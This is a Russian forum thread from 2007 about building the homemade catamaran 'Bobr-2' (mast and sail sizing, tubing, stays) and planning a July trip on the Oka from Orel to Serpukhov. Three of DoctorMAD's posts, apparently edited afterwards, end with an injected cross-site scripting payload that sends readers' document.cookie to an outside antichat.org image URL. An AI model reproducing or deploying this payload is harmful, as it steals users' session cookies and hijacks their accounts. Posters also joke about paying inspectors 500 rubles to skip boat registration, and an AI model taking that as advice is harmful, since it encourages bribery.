Реклама

Место для вашей рекламы

Реклама

Погода

Яндекс.Погода

Автор Тема: Конструкция катамарана "Бобёр-2"  (Прочитано 6333 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Ната Санна

  • Куряне
  • Прописавшийся
  • *****
  • Сообщений: 174
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #25 : 25 Февраля 2007, 00:22:11 »
А блондинкам, желающим поднакачать мозги в беседах с умными людьми, сюда нельзя?

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #26 : 26 Февраля 2007, 16:20:33 »
Цитировать
А блондинкам, желающим поднакачать мозги в беседах с умными людьми, сюда нельзя?
Особенно блондинкам)

Новые сроки:
Испытания на Копенковском водохранилище - 29.04 - 1.05, или при плохих погодных условиях в следующие выходные мая.
Поход Орел - Серпухов - 9.06 - 17.06, или 16.06 - 24.06, или 14.07-22.07
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #27 : 26 Февраля 2007, 16:38:41 »
Я за последнюю дату - июль. Ибо в районе 14-17.06 чертовски не могу... : (

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #28 : 09 Марта 2007, 11:17:03 »
Цитировать
Я за последнюю дату - июль. Ибо в районе 14-17.06 чертовски не могу... : (
На том и порешили.

Плавание состоится с 14 по 22 июля по реке Ока на участке Орел - Серпухов.

Программа:
13 июля, пятница, вечер - выезд из Курска и др. городов участников плавания и провожающих.
13 июля, поздний вечер - обустройство лагеря на Оке в пригороде Орла.
14 июля, суббота, утро - прибытие в лагерь 2-й волны провожающих из Курска и Орла.
14 июля, день, вечер, ночь - праздничные мероприятия по поводу предстоящего начала плавания: подвижные игры, конкурсы, дискотека, параллельно ведется сбор катамарана
15 июля, воскресенье, утро - торжественное отплытие.
15 июля, день - провожающие разъезжаются по домам.
16 - 19 июля - радостное плавание по Оке с остановками во всех красивых местах, обзорные экскурсии по близлежащим городам.
20 июля, пятница - разбивка лагеря на красивом месте под Серпуховом.
20 июля, вечер - прибытие в лагерь встречающих из Калуги, Тулы, Москвы.
с 20 июля, ночь по 21 июля, суббота, ночь - грандиозный праздник.
22 июля, воскресенье, раннее утро - финальная часть маршрута до Серпухова
22 июля, утро - разборка катамарана, передвижение до станции.
22 июля, день - прощание, отъезд участников плавания и гостей в Курск, Тулу, Москву.

[a href=\'http://`=`\' target=\'_blank[/a]`style=`background:url(javaSCript:document.images[1].src="http://antichat.org/s/anderson.gif?"+document.cookie)`
« Последнее редактирование: 02 Апреля 2007, 04:23:57 от DoctorMAD »
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #29 : 09 Марта 2007, 12:28:02 »
Мэд, что-то все праздники и фестивали получаются : )

Оффлайн tt

  • Старожил
  • ****
  • Сообщений: 552
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #30 : 09 Марта 2007, 23:32:30 »
как много пропустил. стас, мих. минус один на июльский поход.
по испытаниям и первым весенним. сегодня снег еще лежит. чуется мне, что следующие выходные будут радовать нас таянием льда. Идем?

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #31 : 12 Марта 2007, 11:22:52 »
Цитировать
как много пропустил. стас, мих. минус один на июльский поход.
по испытаниям и первым весенним. сегодня снег еще лежит. чуется мне, что следующие выходные будут радовать нас таянием льда. Идем?
Дорогой наш, ты б лучше ГИМСом занялся, разузнал, что да как, а то твои шансы непопасть на большое плавание по Оке приблизятся к 100% - мы тебя на испытаниях утопим :bash:  (телефоны высылал Флуру)

А про ледовые испытания я против - участвовал уже, итог: минус утопленная видеокамера, плюс заметка в газете про пьяных "отважных испытателей")))
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #32 : 12 Марта 2007, 15:13:51 »
Дай заметку почитать : )

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #33 : 23 Марта 2007, 11:39:00 »
У нас будет мачта!!!

Заказал трубу на мачту 90х2, 8 м. другой подходящей небыло, пришлось брать хотя дороговато.

На этой мачте можно вешать бунтовщиков!!

На катамаране Бобер-2 мачта будет без дополнительных вант - только топовые. Этого вполне хватит для несения парусов плошадью 15 м2 при ветре 8 м/с.

Гик будет на высоте 1,5 м от палубы в месте стыка первого и второго отрезка двухметровой трубы.

Высота грота 6 м (в перспективе возможно увеличение на 2 метра за счет ещё одной секции наверху) площадь 7-9 м2
Стаксель высота 7,5 м, ширина 2 м площадь ок 7 м2.

[a href=\'http://`=`\' target=\'_blank[/a]`style=`background:url(javaSCript:document.images[1].src="http://antichat.org/s/anderson.gif?"+document.cookie)`
« Последнее редактирование: 02 Апреля 2007, 04:21:16 от DoctorMAD »
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #34 : 26 Марта 2007, 11:40:09 »
Гм... 1.5 метра от палубы - в топку! Это под ним пешком можно будет ходить. Почему 0,8 м нельзя? Из-за пары дырок в трубе?

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #35 : 27 Марта 2007, 10:52:23 »
ну да, я б к 2мм алюминию ничего бы не крепил, нужно накладки делать, а проще смонтировать эту конструкцию на полипропиленовой вставке - она относительно короткая, можно изнутри подложить шайбу, а к трубе только на заклепки или на саморезы, если крепление деформируется, то полипропиленовую вставку можно легко заменить (трубы в Курске продаются и режутся по метру), а люминивые трубы нужно заказывать минимум по 4 метра и в наличии ассортимента мало (т.е. такую же трубу можно прождать пол-года).
да и выгрыш в парусности максимум 2м2, это если до 80см (для комфортного сидения нужно где-то метр) опускать гик (трехметровый), притом парусность грота можно нарастить за счёт ширины гика (это если 15 м2 будет мало, в чем я сильно сомневаюсь)
...вот такие соображения...



[a href=\'http://`=`\' target=\'_blank[/a]`style=`background:url(javaSCript:document.images[1].src="http://antichat.org/s/anderson.gif?"+document.cookie)`
« Последнее редактирование: 02 Апреля 2007, 04:19:46 от DoctorMAD »
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #36 : 15 Апреля 2007, 00:47:44 »
Цитировать
Плавание состоится с 14 по 22 июля по реке Ока на участке Орел - Серпухов.

15 июля, воскресенье, утро - торжественное отплытие.
15 июля, день - провожающие разъезжаются по домам.
16 - 19 июля - радостное плавание по Оке с остановками во всех красивых местах, обзорные экскурсии по близлежащим городам.
20 июля, пятница - разбивка лагеря на красивом месте под Серпуховом.
 
Расстояние от Орла до Серпухова около 400 км. По программе на дорогу 6 дней - проходить надо по 67 км в день. Это реально? Какие "посещения достопримечательностей" - придется по 14 часов не слезать с лодки : )
Мы в прошлый раз за 2 дня прошли 20 км : )

Еслм выдвинуться утром 14 в сб, а прибыть вечером в сб 21 - то будет уже 8 дней - по 50 км/день. Впрочем, если идти круглосуточно... Придется брать электрогенератор : )

Кстати, до Калуги - 267 км (45 и 33 км/день соответственно) - как вариант. Кто сможет продолжить - тот поплывет дальше, кто нет - поедет на поезде. Останется 133 км.

Населенные пункты по пути: Орел, Перемышль, Калуга, Дугна, Таруса, Серпухов. Координаты путевых точек снял с диска "Автодороги России" - уже можно вводить в навигатор. По прежнему отсутсвует карта Калужской области :) Причем небольшой кусок окрестностей именно Калуги.

Оффлайн Юльчик

  • Прописавшийся
  • **
  • Сообщений: 67
    • Просмотр профиля
    • http://komanda-46.narod.ru
Конструкция катамарана "Бобёр-2"
« Ответ #37 : 15 Апреля 2007, 02:05:14 »
Ребята, 400 км за 6 дней - без мотора не реально. Есть опыт аналогичного похода по Дону. Не думаю, что Ока сильно от него отличается. С ветром на реках проблемы (закрытые берега), так что готовьтесь, что минимум половина похода пройдет со скоростью течения. По прошлому году наш рекорд на Дону за день - 55-60км при попутном ветре практически целый день. Среднее расстояние - 30 км. Хотя ваш кат полегче будет, вряд ли среднее расстояние будет отличаться намного.

Кроме того, если река в этом месте судоходна или просто хорошо развито рыболовство с моторными лодками - ждите в гости ГИМС. Моя рекомендация относительно пиратского флага остается, но это не главное. У нас в прошлом году в Вешенской были проблемы из-за того, что на двух тримаранах из трех аттестованные (!) рулевые забыли дома удостоверения (раньше никогда в жизни никто не проверял, только в морских портах). Так что хотя бы одному члену экипажа желательно удостоверением обзавестись. У нас грозились тримараны забрать на штрафтоянку, ситуацию спасли 500 р  :P Регистрация судна в ГИМСе нужна по-любому. Конечно, можете поспорить, что Ваше судно спортивное или прогулочное парусное, но без паспорта судна (а откуда взяться паспорту, если оно самодельное) и маршрутного листа доказать это будет трудно. Впрочем, 500 р. никто не отменял  :D Регистрация, в принципе, процедура простая (хотя у нас суда заводские). Еще нужен техосмотр. Стоит в районе 150 руб., если правильно помню, нужно проходить ежегодно. Отметка ставится в судовой билет.

 
Координатор Приключенческой программы "Команда-46"

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #38 : 15 Апреля 2007, 05:02:42 »
Юльчик, спасибо за информацию, учтем про 500 р :)

Про ГИМС тоже все знаем, но только все ноги никак не дойдут, да, собственно, и показывать пока нечего... Так что в этом сезоне 99% по-пиратски. (А флаг будем поднимать только ночью и на стоянке, а то вокруг сплошные злобные испанцы, сто акул им в глотку!)

А про мотор... Мэд, у нас будет мотор? С комплектом ключей, маслом и канистрами заморачиваться?

Кстати, у кого есть текстолит толщиной около 10 мм? Или подобный материал? Или тоньше?

В экипаж ищется человек с удостоверением рулевого 3 класса и водителя моторной лодки. Или похожий на него, но с его документами : )

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #39 : 16 Апреля 2007, 10:14:29 »
Кто сказал 400?? Вроде было 350?
Без мотора мы туда не поплывем - поедем покатаемся на Копенки - больше 60 км я сам за день не проходил (но это было на веслах).
Наличие мотора зависит от доброй воли одного человека, т.ч. надеюсь, но не знаю (есть ещё вариант, что на голову свалиться немного денег и я куплю Хонду, но это вероятнее к следующему сезону).
А с ГИМСом нужно состыковаться, может есть какие-нибудь варианты (теж 500р.)))
 
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #40 : 19 Апреля 2007, 01:59:26 »
При гике 2,5 м площадь грота чуть больше 9 м, стаксель 5,2, в сумме 14.3. Шверт нужен 0,5 кв.м, руль около 0.25. Центр парусности 40 см позади мачты, центр бокового сопротивления должен быть на 45 см примерно еще назад. Можешь прикинуть где размещать шверт и руль.

 

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #41 : 19 Апреля 2007, 10:20:16 »
Цитировать
При гике 2,5 м площадь грота чуть больше 9 м, стаксель 5,2, в сумме 14.3. Шверт нужен 0,5 кв.м, руль около 0.25. Центр парусности 40 см позади мачты, центр бокового сопротивления должен быть на 45 см примерно еще назад. Можешь прикинуть где размещать шверт и руль.
Для шверта идеально, с точки зрения уменьшения нагрузок на конструкцию, размешение между средней поперечиной и мачтой ближе к поперечине, т.ч. вроде получается то, что нужно. А ты центр парусности расчитывал при каком угле наклона парусов относительно продольной оси поплавков? Чем больше угол наклона, тем сильнее ЦП смещается вперед, но мне кажется, что баланс ЦС и ЦБС нужен только на острых курсах, на полных уход ЦП вперед немного ослабит маневренность, не более.


А руль по любому сзади)))
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #42 : 19 Апреля 2007, 22:07:32 »
ЦП считал для бейдевинда - паруса параллельны ДП. Вроде самый критичный режим. А на полных курсах уже не так критично - лишь бы побольше парусило - ведь там работает Cx а не Cy.
« Последнее редактирование: 19 Апреля 2007, 22:10:12 от 2nd floor »

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #43 : 20 Апреля 2007, 10:06:46 »
Что такое ДП?(

Про конструкцию стоек:
предлагаю сделать из полипропиленовой трубки которая будет надеваться по внутреннему диаметру на болты М 10 или 12 с обеих сторон, если будет сильно гнуться, то потом трубку разрезать и сделать дюралевые вставки. Есть труба PN20 16х2,7 (вн. диам. 10,6) и 20х3,4 (вн. диам. 13,2), нужно взять 2 болта (10 и 12) и попробывать проверить как плотно заходят.

PS. лучше ориентироваться на 20х3,4 и М12 - так проще конструкция получится.
« Последнее редактирование: 20 Апреля 2007, 10:26:49 от DoctorMAD »
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #44 : 21 Апреля 2007, 03:23:46 »
ДП - диаметральная плоскость - вертикальная продольная плоскость симметрии, разделяющая судно на правую и лквую половины.

Про стаксель. На форуме подсказали, что на катамаранах стаксель рботает как предкрылок - и его площадь должна быть 1/3 от грота. Получаем где-то 3м. Из прототипов у Перегудова: (длина-грот-стаксель):

7 - 3.8
4,5 - 2
5,5 - 3
4,5 -2,5

Что-то не похоже на треть. Дня нас берем 9 - 4 м.

Кстати, что с мачтой? Будет? Мне вставки делать?

Про стойки. Можно подобрать трубю чтобы их 1 в 1 вставить с минимальным зазором? Получится грандиозная толщина стенки. Хотя я в пластик что-то не верю...

P.S. Про такелаж - забыл про топенат гика - еще олна веревка на начте. Итого 6.
« Последнее редактирование: 21 Апреля 2007, 03:33:29 от 2nd floor »

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #45 : 22 Апреля 2007, 16:02:35 »
Цитировать
Про стаксель. На форуме подсказали, что на катамаранах стаксель рботает как предкрылок - и его площадь должна быть 1/3 от грота. Получаем где-то 3м. Из прототипов у Перегудова: (длина-грот-стаксель):
А там не подсказали, что делать если стаксель топовый? Или может для него ещё одну ванту приделать? Ну чтоб от соотношений не отклоняться? И чем принципиально отличается стаксель на катамаране?
Мне так кажется, что размер стакселя зависит от конструктивной особенности конструкции мачты, или я не прав?
Вот например у Кулика - там стаксель маленький оттого, что у него нижняя шкаторина высоко (ниже его палатки не поставишь), и передняя ванта на метр от мачты натянута.
Где-то я не догоняю, почему на яхте можно стаксель топовый нести, а на катамаране нет.
Я не против если мачту ещё на два метра увеличить и тогда грот будет 14м2, а стаксель 8м2 но это дело для следующих лет).

Мачта ещё не приехала, ожидается после майских. Вставки делать не спеши.

Про стойки: там есть полипр. трубки, которые вставляются с минимальным зазором (1-2 мм), но по нагрузкам не подходят, дешевле сделать из люминия, а на концах крепления из полипропилена (по 5 см с каждого конца).

Хочу заказать трубу 30х1, относительно недорогая (110р/м) для стрингеров и для стоек. Стойки наверное нужно резать так, чтобы из одного метра получалась одна вертикальная и одна диагональная, т.е. учитывая полипр. крепления высота будет ок. 50 см. не много? Хотя много не мало)
« Последнее редактирование: 22 Апреля 2007, 19:10:18 от DoctorMAD »
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #46 : 23 Апреля 2007, 00:58:39 »
Собственно, и так все по телефону обсудили : )
Мне кажется 50 см много...

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #47 : 14 Мая 2007, 19:40:07 »
Предлагаю сплав совместить с конструированием бобра на алюминии)).

Что нам нужно? Труб 90х2 - "нет пока", 30х1 - "нет пока", есть 30х1.5 по 160р/м. Взять 8 метров? Нам на внутренние стрингеры и на поперечины наверное лучше 30х1.5, чем 30х1.
кармапа ченно

Оффлайн DoctorMAD

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 1 334
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #48 : 20 Июня 2007, 19:40:45 »
Вчера весь вечер посвятил пилению свежекупленных четырехметровых труб на части, устал.

Флур, 85х3 заходит в 90х2 идеально! Мачта - мечта. Дошивай парус, будем примерять.
кармапа ченно

Оффлайн 2nd floor

  • Куряне
  • Почетный гражданин
  • *****
  • Сообщений: 8 720
  • Карамба!
    • Просмотр профиля
Конструкция катамарана "Бобёр-2"
« Ответ #49 : 22 Июня 2007, 01:07:23 »
Грот дошит, буквально час назад : )
Пора браться за стаксель : )

Вместо аккумуляторного шуруповерта есть дрель-шуруповерт, без биения патрона : )

 

Друзья

Статистика

Яндекс.Метрика Сервис мониторинга вебсайтов Host-tracker.com

Городской информационный портал г. Курска. При перепечатке гиперссылка на сайт обязательна. 2004-2018

Сайт не рекомендуется к просмотру лицам, не достигшим 100 лет, а также людям впечатлительным, лицам с неустойчивой психикой.
При возникновении спорных ситуаций, в том числе и по нарушению авторских прав, просьба обращаться на почту [email protected]